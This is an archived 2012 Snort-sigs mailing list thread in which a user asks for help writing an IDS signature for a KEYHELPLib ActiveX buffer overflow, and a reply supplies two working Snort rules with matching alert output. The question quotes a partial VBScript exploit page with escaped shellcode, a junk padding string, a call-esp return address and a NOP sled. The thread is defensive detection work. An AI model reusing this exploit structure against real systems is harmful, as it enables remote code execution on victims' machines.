Snort mailing list archives

Problem writing a sig to capture vbscript unescape sequence

From: Nathan Benson <nathan () packetdamage com>
Date: Fri, 18 May 2012 17:16:11 -0400

Hi Bob,

I was able to successfully detect the content you were looking for using
2.9.2.1, 2.9.2.2, and 2.9.2.3 all with the default snort.conf using the
rules below.

I hope this is of some help.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX
KEYHELPLib overflow attempt"; flow:to_client,established; file_data;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only;
pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi";
classtype:attempted-user; sid:1010000; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX
KEYHELPLib overflow attempt"; flow:to_client,established; file_data;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only;
content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase;
classtype:attempted-user; sid:1010001; rev:1;)

Here they are again unfolded:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"ActiveX KEYHELPLib overflow attempt"; \
flow:to_client,established; \
file_data; \
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \
pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi";
\
classtype:attempted-user; \
sid:1010000; rev:1; \
)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"ActiveX KEYHELPLib overflow attempt"; \
flow:to_client,established; \
file_data; \
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \
content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase; \
classtype:attempted-user; \
sid:1010001; rev:1; \
)

10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:23031
***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:23031
***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:5414
***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:5414
***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20

On Fri, May 18, 2012 at 1:52 PM, Bob Huber <roberthuberjr () yahoo com> wrote:

I'm trying to write a sig for this ActiveX overflow:

<html>
<body>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C'
id='KEYHELPLib' />
</object>
<script language='vbscript'>
//executing calc
scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
& _
             ...SNIP...
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>
</body>
</html>

The problem I'm having is trying to get a content match off of the line -
   eip = unescape("%67%41%41%7e")
I can't figure out how to match that content.  I'm running both 2.8.5 and
2.9.2.  I was assuming it would see the <script> tag and it would try to
decode javascript, and maybe that was the problem.  I've tried file_data,
I've tried pkt_data. I've turned off javascript normalization, I've turned
off extended_response_inspection.  No luck.

Any help appreciated.

Bob


------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!

Current thread:

Problem writing a sig to capture vbscript unescape sequence Bob Huber (May 18)
- Re: Problem writing a sig to capture vbscript unescape sequence Balasubramaniam Natarajan (May 18)
- <Possible follow-ups>
- Problem writing a sig to capture vbscript unescape sequence Nathan Benson (May 18)